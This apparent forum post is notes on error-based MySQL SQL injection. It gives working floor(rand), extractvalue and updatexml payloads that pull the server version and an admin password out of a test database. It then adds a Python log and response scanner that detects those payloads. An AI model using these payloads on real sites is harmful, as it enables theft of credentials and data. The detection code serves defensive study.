Posting some of my old notes. When MySQL executes a statement it raises an error message, and PHP+MySQL sites often display that error text on the page, so the following three methods can be constructed to extract specific data through the error.

Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+

1. Error via floor()
Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was leaked through the error. To query other data, replace the expression in the position of version().
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

All, thanks foreign guys.
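
Added here as a defender-side example (not part of the original post): a small Python scanner that flags the three error-based payload shapes shown above in web access-log entries, and the leaked MySQL error strings in response bodies. The log lines, response bodies and the article.php path are constructed samples, not data from the post.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three error-based techniques discussed above,
# applied to a normalised (decoded, lower-cased, space-collapsed) request URL.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\(rand\(\d*\)\*2\).*group by|group by.*floor\(rand\(\d*\)\*2\)"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
}
# Response-side signatures: the MySQL error text that reaches the browser when
# the application echoes the database error into the page.
RESPONSE_SIGNATURES = {
    "duplicate_group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '"),
}

def normalize(url):
    """Decode twice (catches double encoding), strip /* */ comments, collapse
    whitespace, lower-case: formatting differences must not hide the keywords."""
    s = unquote_plus(unquote_plus(url))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).lower()

def scan_request(log_line):
    """Signature names matched by the request URL of one combined-format
    access-log entry; empty list when the line is clean or unparsable."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    if not m:
        return []
    target = normalize(m.group(1))
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(target)]

def scan_response(body):
    """Signature names found in a captured HTTP response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]

# Constructed sample data: the page's three payloads as they would appear in the
# access log of the vulnerable article.php, plus one benign request.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2010:12:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:12:00:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 231',
    '10.0.0.9 - - [01/Jan/2010:12:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 198',
    '10.0.0.9 - - [01/Jan/2010:12:00:03 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 190',
]
# Constructed: page bodies as they look when the error is echoed, plus a clean page.
SAMPLE_RESPONSES = ["<p>Duplicate entry '5.1.33-community-log1' for key 'group_key'</p>",
                    "<p>XPATH syntax error: '\\admin888'</p>", "<p>test: do it</p>"]
```

A response-side hit means the application is echoing database errors into the page, which is the condition all three methods depend on; a request-side hit without one still shows someone probing the parameter.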